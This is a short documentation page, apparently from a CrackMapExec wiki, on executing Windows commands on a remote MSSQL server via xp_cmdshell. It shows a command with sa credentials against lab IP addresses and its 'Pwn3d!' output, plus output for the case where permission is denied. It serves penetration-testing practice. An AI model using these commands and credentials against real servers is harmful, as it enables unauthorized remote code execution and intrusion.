Windows command

Search…

Windows command

Execute Windows command using CrackMapExec

Execute Windows Command
This option use xp_cmdshell to exec command on the remote host.
1
#~ cme mssql 10.10.10.59 -u sa -p 'GWE3V65#[email protected]' --local-auth -x whoami
2
MSSQL       10.10.10.59     1433   None             [+] sa:GWE3V65#[email protected] (Pwn3d!)
3
MSSQL       10.10.10.59     1433   None             [+] Executed command via mssqlexec
4
MSSQL       10.10.10.59     1433   None             --------------------------------------------------------------------------------
5
MSSQL       10.10.10.59     1433   None             tally\sarah
Copied!
If permission is DENIED:
1
MSSQL       10.10.10.52     1433   None             [+] admin:[email protected][email protected]! (Pwn3d!)
2
MSSQL       10.10.10.52     1433   None             [-] ERROR(MANTIS\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
3
MSSQL       10.10.10.52     1433   None             [+] Executed command via mssqlexec
4
MSSQL       10.10.10.52     1433   None             None
Copied!
When playing with MSSQL, you can use the tool MSDAT from quentinhardy​
GitHub - quentinhardy/msdat: MSDAT: Microsoft SQL Database Attacking Tool
GitHub
​

MSSQL protocol - Previous

MSSQL command

Next - SSH protocol

Password spraying

Last modified 1yr ago

Copy link